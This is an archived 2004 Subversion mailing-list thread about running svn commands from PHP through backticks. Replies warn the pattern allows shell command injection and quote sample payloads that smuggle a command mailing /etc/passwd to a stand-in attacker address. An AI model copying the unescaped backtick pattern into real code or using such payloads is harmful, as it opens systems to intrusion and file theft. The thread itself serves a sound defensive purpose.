You are viewing a plain text version of this content. The canonical link for it is here.

Posted to users@subversion.apache.org by "Simmons, Bryan" <bs...@gpworldwide.com> on 2004/02/11 20:58:15 UTC

PHP hack under way

Ok, so I went ahead and took the easiest approach I could:  svn client
commands in php.
The kinks have not all been worked out for my php portal but I did find
a way to successfully
push revisions to subversion through php.

I use the backtick operator.  Yep, it's that simple.  

$response = `svn commit -m \"$message\"`;

I have found that the $response is dead-on accurate in this case despite
warnings that the 
command line response may be garbled into binary.

Here's a question:  will svn add && svn commit work?


Regards,

Bryan Simmons
Network Systems Engineer
General Physics
410.379.3710
bsimmons@genphysics.com

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org

Re: PHP hack under way

Posted by Ben Collins-Sussman <su...@collab.net>.

On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:

> I use the backtick operator.  Yep, it's that simple.  
> 
> $response = `svn commit -m \"$message\"`;
> 

By the way, I hear rumors that SWIG can produce real PHP bindings the
Subversion C API.  People are already using SWIG to produce python,
perl, and java bindings.  That might be a better long-term approach.

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org

Re: PHP hack under way

Posted by Florian Weimer <fw...@deneb.enyo.de>.

Brian W. Fitzpatrick wrote:

> > $response = `svn commit -m \"$message\"`;

> I don't know offhand, but I suspect that you may be opening up a
> security hole the size of Texas by doing this.  What if message is
> actually equal to 
> 
> "foo\" ; mail evilhaxor@example.com < /etc/passwd"
> 
> or something worse. 

With magic_quotes_gpc, this doesn't work, but

  $(mail evilhaxor@example.com < /etc/passwd)

probably does...

You could use escapeshellarg() and similar functions to preprocess the
argument, but I don't understand the C source code and still have an
uneasy feeling about them.

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org

Re: PHP hack under way

Posted by "Brian W. Fitzpatrick" <fi...@red-bean.com>.

On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:
> Ok, so I went ahead and took the easiest approach I could:  svn client
> commands in php.
> The kinks have not all been worked out for my php portal but I did find
> a way to successfully
> push revisions to subversion through php.
> 
> I use the backtick operator.  Yep, it's that simple.  
> 
> $response = `svn commit -m \"$message\"`;
> 
> I have found that the $response is dead-on accurate in this case despite
> warnings that the 
> command line response may be garbled into binary.
> 
> Here's a question:  will svn add && svn commit work?

I don't know offhand, but I suspect that you may be opening up a
security hole the size of Texas by doing this.  What if message is
actually equal to 

"foo\" ; mail evilhaxor@example.com < /etc/passwd"

or something worse. 

Just a little something to think about.

-Fitz


---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org